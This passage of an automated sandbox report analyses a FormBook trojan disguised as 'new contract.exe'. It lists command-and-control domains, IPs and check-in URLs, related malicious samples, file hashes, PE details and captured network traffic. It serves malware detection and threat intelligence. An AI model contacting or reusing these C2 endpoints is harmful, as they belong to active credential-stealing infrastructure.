                                                                                                                                                            https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.fonts.comnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.sandoll.co.krnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.ldkp.netReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.sakkal.comnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.livialiving.online/c89p/www.innivip.bioexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown

                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                          Public IPs

                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          89.31.143.90
                                                                                                                                                                          		www.igmoto.infoGermany
                                                                                                                                                                          		15598QSC-AG-IPXDEtrue

                                                                                                                                                                          General Information

                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                          Analysis ID:1531093
                                                                                                                                                                          Start date and time:2024-10-10 21:04:06 +02:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 11m 8s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Sample name:new contract.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.evad.winEXE@10/1@11/1
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          • Number of executed functions: 119
                                                                                                                                                                          • Number of non-executed functions: 317
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                          Warnings

                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                          • VT rate limit hit for: new contract.exe

                                                                                                                                                                          Simulations

                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          15:04:59API Interceptor2x Sleep call for process: new contract.exe modified
                                                                                                                                                                          15:05:09API Interceptor7255810x Sleep call for process: explorer.exe modified
                                                                                                                                                                          15:05:48API Interceptor6463623x Sleep call for process: NETSTAT.EXE modified

                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                          IPs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          89.31.143.90z61SwiftCopyOfPayment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.defi-banksystem.online/jd21/?pPA800q0=OfBw10hwpCCrpj6SWyg7DTf/L6lD4iBR/skVq0WtSp6vFrxfDc86zYTahsBzIv7sBslXrUXtcg==&SZ=dnxdCh7P22ilbRg
                                                                                                                                                                          Quotation #10091.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.igmoto.info/c89p/?9rglphR0=uK/A8O7zjdQhDaN+OEATE3Xrf7RWVy6yiEUunzdvsHMfMNs/vPJv/pK5tRu4O55vsOUb+soYKw==&_FQtYF=uVEdzxQhb0e4
                                                                                                                                                                          LisectAVT_2403002B_309.exeGet hashmaliciousBdaejec, FormBookBrowse
                                                                                                                                                                          • www.pandafitnessboo.com/34ev/
                                                                                                                                                                          LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.pandafitnessboo.com/d5fo/
                                                                                                                                                                          eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • lucem.be/wordpress/wp-login.php
                                                                                                                                                                          Fzfee1Lgc2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • brainix.de/
                                                                                                                                                                          Petromasila 16072024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • www.sophi.page/5j76/
                                                                                                                                                                          unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.pandafitnessboo.com/k77u/
                                                                                                                                                                          Ballahoo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.pandafitnessboo.com/k77u/
                                                                                                                                                                          PO Copy_7854569.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.leaflearn.store/a42m/

                                                                                                                                                                          Domains

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          www.igmoto.infoQuotation #10091.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 89.31.143.90

                                                                                                                                                                          ASNs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          QSC-AG-IPXDEz61SwiftCopyOfPayment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 89.31.143.90
                                                                                                                                                                          Quotation #10091.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 89.31.143.90
                                                                                                                                                                          firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 89.31.143.90
                                                                                                                                                                          SecuriteInfo.com.Linux.Siggen.9999.14080.25460.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 82.149.82.249
                                                                                                                                                                          KKveTTgaAAsecNNaaaa.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 80.190.241.214
                                                                                                                                                                          z55FACTURADEPROFORMApdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 89.31.143.90
                                                                                                                                                                          Transferencia bancaria.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 89.31.143.90
                                                                                                                                                                          xprot-v6106eu.exeGet hashmaliciousMeshAgentBrowse
                                                                                                                                                                          • 81.17.102.224
                                                                                                                                                                          xprot-v6106eu.exeGet hashmaliciousMeshAgentBrowse
                                                                                                                                                                          • 81.17.102.224
                                                                                                                                                                          sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 80.190.153.237

                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                          No context

                                                                                                                                                                          Dropped Files

                                                                                                                                                                          No context

                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new contract.exe.log

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\new contract.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1216
                                                                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                          Static File Info

                                                                                                                                                                          General

                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                          Entropy (8bit):7.829540406878151
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                          File name:new contract.exe
                                                                                                                                                                          File size:601'600 bytes
                                                                                                                                                                          MD5:c6b38036b68ea21306e8814ab1b1b4d9
                                                                                                                                                                          SHA1:6b1ee982b77f2274ff6844f06706f13418dc6aa0
                                                                                                                                                                          SHA256:732336eccda1e0e01a9474a968eb6ac9725fec8e8e03ad950472df75ba470693
                                                                                                                                                                          SHA512:ffe83694f14e956fcd63e0f83845a1d631da501cfbf3552f0bc043d228b3fe59465a6c30bfd5c4bb98faaa89d00ecc4bf5881734a9d26d40759f7ce45eeee833
                                                                                                                                                                          SSDEEP:12288:b5WqpMT1dGUsVYQP3OT0UuA/4jj2m5tpyoBfVN07dq9ovF6sDYSuk7xLZXo:bw0c1dGUsVYQ6uO/mbhVKqqYVk7xdo
                                                                                                                                                                          TLSH:EDD412A66A29DE22D88217B65431EB7717762EDCF021E3078FFEFCE3740A7601954291
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..g..............0..............5... ...@....@.. ....................................`................................

                                                                                                                                                                          File Icon

                                                                                                                                                                          Icon Hash:01242c66198d8d9e

                                                                                                                                                                          Static PE Info

                                                                                                                                                                          General

                                                                                                                                                                          Entrypoint:0x4935fa
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x67079D75 [Thu Oct 10 09:25:09 2024 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                          Instruction
                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al

                                                                                                                                                                          Data Directories

                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x935a80x4f.text
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x940000x13a0.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x960000xc.reloc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                          Sections

                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x20000x916000x9160090a675e29cf0abadb37d1deb49041f21False0.9244763676913156data7.83819492389617IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rsrc0x940000x13a00x1400365d9ab0b3dc0321aa7fb04213806ffeFalse0.778125data7.0256123925831035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .reloc0x960000xc0x200c5a692969a170b74d97ee91727e67cf3False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                          Resources

                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                          RT_ICON0x940c80xf91PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8936010037641154
                                                                                                                                                                          RT_GROUP_ICON0x9506c0x14data1.05
                                                                                                                                                                          RT_VERSION0x950900x30cdata0.43205128205128207

                                                                                                                                                                          Imports

                                                                                                                                                                          DLLImport
                                                                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                                                                          Network Behavior

                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                          2024-10-10T21:06:44.004230+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44997989.31.143.9080TCP
                                                                                                                                                                          2024-10-10T21:06:44.004230+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44997989.31.143.9080TCP
                                                                                                                                                                          2024-10-10T21:06:44.004230+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44997989.31.143.9080TCP

                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                          TCP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Oct 10, 2024 21:06:42.471518040 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:42.476526976 CEST804997989.31.143.90192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:42.476742029 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:42.476766109 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:42.481987953 CEST804997989.31.143.90192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:42.990436077 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:43.349745989 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:43.996750116 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:44.004156113 CEST804997989.31.143.90192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:44.004168034 CEST804997989.31.143.90192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:44.004199028 CEST804997989.31.143.90192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:44.004211903 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:44.004230022 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:44.004251957 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:44.004348993 CEST804997989.31.143.90192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:44.004390001 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:44.004874945 CEST804997989.31.143.90192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:44.004909992 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:44.006369114 CEST804997989.31.143.90192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:44.006383896 CEST804997989.31.143.90192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:44.006413937 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:44.006432056 CEST4997980192.168.2.489.31.143.90
                                                                                                                                                                          Oct 10, 2024 21:06:44.007328987 CEST804997989.31.143.90192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:44.007386923 CEST4997980192.168.2.489.31.143.90

                                                                                                                                                                          UDP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Oct 10, 2024 21:05:41.991652012 CEST5424753192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:05:42.008086920 CEST53542471.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:01.756526947 CEST5014253192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:06:01.774740934 CEST53501421.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:22.303647041 CEST4963653192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:06:22.322021961 CEST53496361.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:06:42.447335958 CEST6303153192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:06:42.465980053 CEST53630311.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:07:03.708362103 CEST5347353192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:07:03.720439911 CEST53534731.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:07:24.403346062 CEST5674053192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:07:24.414304018 CEST53567401.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:07:44.887103081 CEST6113153192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:07:44.975795984 CEST53611311.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:08:05.294194937 CEST5894553192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:08:05.326864004 CEST53589451.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:08:46.133080959 CEST5033953192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:08:46.164599895 CEST53503391.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:09:08.146991014 CEST5961053192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:09:08.158818960 CEST53596101.1.1.1192.168.2.4
                                                                                                                                                                          Oct 10, 2024 21:09:28.303445101 CEST6417053192.168.2.41.1.1.1
                                                                                                                                                                          Oct 10, 2024 21:09:28.411026001 CEST53641701.1.1.1192.168.2.4

                                                                                                                                                                          DNS Queries

                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                          Oct 10, 2024 21:05:41.991652012 CEST192.168.2.41.1.1.10x721dStandard query (0)www.livialiving.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:06:01.756526947 CEST192.168.2.41.1.1.10x90b2Standard query (0)www.innivip.bioA (IP address)IN (0x0001)false
